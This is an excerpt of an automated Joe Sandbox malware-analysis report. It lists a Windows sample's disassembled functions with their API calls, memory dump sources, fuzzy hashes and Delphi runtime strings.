                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2331C971E0025CA9EB27DAB4DC66FDE77AE9F04380F4441E1960AE6280D774DE48CF60
                                                                                                                                                                                                                                                                                                                                  Function 02DB7FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02DB7FF5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1705453755-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ee89df898164a92fad66987575a2ff485a7d558a94dc2a13317c1d7aaf433da5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D411BEB5A00209AFDB45CFA9C8819EFF7F9EFC8700F54C569A505E7354E6719E018BA0
                                                                                                                                                                                                                                                                                                                                  Function 02DBA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DBA7E2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a949fb96fe8a2e070b5b0f6b92cd56c9447409fff6f3330bfe8b7ed29fb07ee2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AE09271B0461497D712A5689CA0EEA729DDF58310F0042AAAA06C7386EDA19E804AF4
                                                                                                                                                                                                                                                                                                                                  Function 02DBB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32(?,02DDD106,00000000,02DDD11E), ref: 02DBB79A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7e020d7a817db396312b0eb79a2b05727c422c4f1a50a5498bb2b324e1621c8d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e6b6c6af254f94d819656f7fb717fcf9b04f5e0ba3576627e3cedea5f3151874
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e020d7a817db396312b0eb79a2b05727c422c4f1a50a5498bb2b324e1621c8d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1F0F474905701EFD380DF28D85165577E9FB88704F004D29EA99CB780E734DC14DB92
                                                                                                                                                                                                                                                                                                                                  Function 02DBA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02DBBE72,00000000,02DBC08B,?,?,00000000,00000000), ref: 02DBA823
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dbb028c37e6fc63ca345f24ce9bd74a11ab31a7d926413d113d5ed33a09721a5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6ED05EA630E2A06AE611915A2D94DFB5ADCCEC57A1F00407ABA89C6301E200CC07DAB1
                                                                                                                                                                                                                                                                                                                                  Function 02DB920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 481472006-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3bfcaa6e8d270f95427a4603a5eef5e0e405a6f5a0ef9dc6cc55dbbb917cd9a3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1A0124040486081C54037280C025B830449C10A20FC4878068F8403D0E91D452080E3
                                                                                                                                                                                                                                                                                                                                  Function 02DBC977 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ba133fb791def6e238dd9efcc16a6775a6689879e6b38b1fa52c23b89c104c61
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e7e4fa9c819e5356225edb9098194d8a24cfb054382bec8b431342f49586ea58
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba133fb791def6e238dd9efcc16a6775a6689879e6b38b1fa52c23b89c104c61
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10D17AA592E7C6CFDB035B34983419A7F31EE5B60179A05DBC1838F2A3D9184C1AC77A
                                                                                                                                                                                                                                                                                                                                  Function 02DB20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                                                                                                                                                                                  Function 02DBD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02DBD29D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBD268: GetProcAddress.KERNEL32(00000000), ref: 02DBD281
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e47b882a0205408457d2a8f603f4f44f206342a51d370374bd1937c67d1a125
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e8fab296d49107aa118312e40f9a0dc9df32ae8bd3a3613a07e7d3244c7ff5b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e47b882a0205408457d2a8f603f4f44f206342a51d370374bd1937c67d1a125
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 744180E5D9834CDA520B6A6E74244ABB7DFEF44B117E0851AF40A8B784D920FC918A39
                                                                                                                                                                                                                                                                                                                                  Function 02DC6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02DC6EDE
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02DC6EEF
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02DC6EFF
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02DC6F0F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02DC6F1F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02DC6F2F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02DC6F3F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 667068680-2233174745
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32d894b556e14c7ae09efed5d198a3cdca91296fb200d563fd416cf9631598a7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ead805779fbf0bed1488ca1cbbe05c2cc80df95cac92434e67f3439580048abb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d894b556e14c7ae09efed5d198a3cdca91296fb200d563fd416cf9631598a7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5F0FEE1A8D783ADFA01BB706CA1866275DED54604B202C5968039A7C6E675EC188EA0
                                                                                                                                                                                                                                                                                                                                  Function 02DB2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02DB28CE
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-32948583
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 430552654fb4a7558b78cf0125a718bc078da6b145598ef69b7b6475ec9c58b9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e35bd9475ce2e83d96671639618cadd70e56d1e3ff533d883f26bf90f7786ffe
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430552654fb4a7558b78cf0125a718bc078da6b145598ef69b7b6475ec9c58b9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3A1F532A04294CBDF23AA2CCCA8BD9B6E5EF09350F5441E5DD4A9B381CB758D85CF61
                                                                                                                                                                                                                                                                                                                                  Function 02DB252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • The unexpected small block leaks are:, xrefs: 02DB2707
                                                                                                                                                                                                                                                                                                                                  • bytes: , xrefs: 02DB275D
                                                                                                                                                                                                                                                                                                                                  • , xrefs: 02DB2814
                                                                                                                                                                                                                                                                                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02DB2849
                                                                                                                                                                                                                                                                                                                                  • An unexpected memory leak has occurred. , xrefs: 02DB2690
                                                                                                                                                                                                                                                                                                                                  • 7, xrefs: 02DB26A1
                                                                                                                                                                                                                                                                                                                                  • Unexpected Memory Leak, xrefs: 02DB28C0
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2723507874
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 286ed1eaccedd10215fa847134e9a235d99b98ef959f69cd6bb27e11c7867cec
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 02cb78ceb8844b0eeb910fea3f71a27abe4efd127da51255fc4ac8957415bfb3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 286ed1eaccedd10215fa847134e9a235d99b98ef959f69cd6bb27e11c7867cec
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F871C331A04298CFDF22AA2CCC98BD9B6E5EF09350F5041E5D94A9B381CB758DC5CF61
                                                                                                                                                                                                                                                                                                                                  Function 02DBBDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,02DBC08B,?,?,00000000,00000000), ref: 02DBBDF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DBA7E2
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Locale$InfoThread
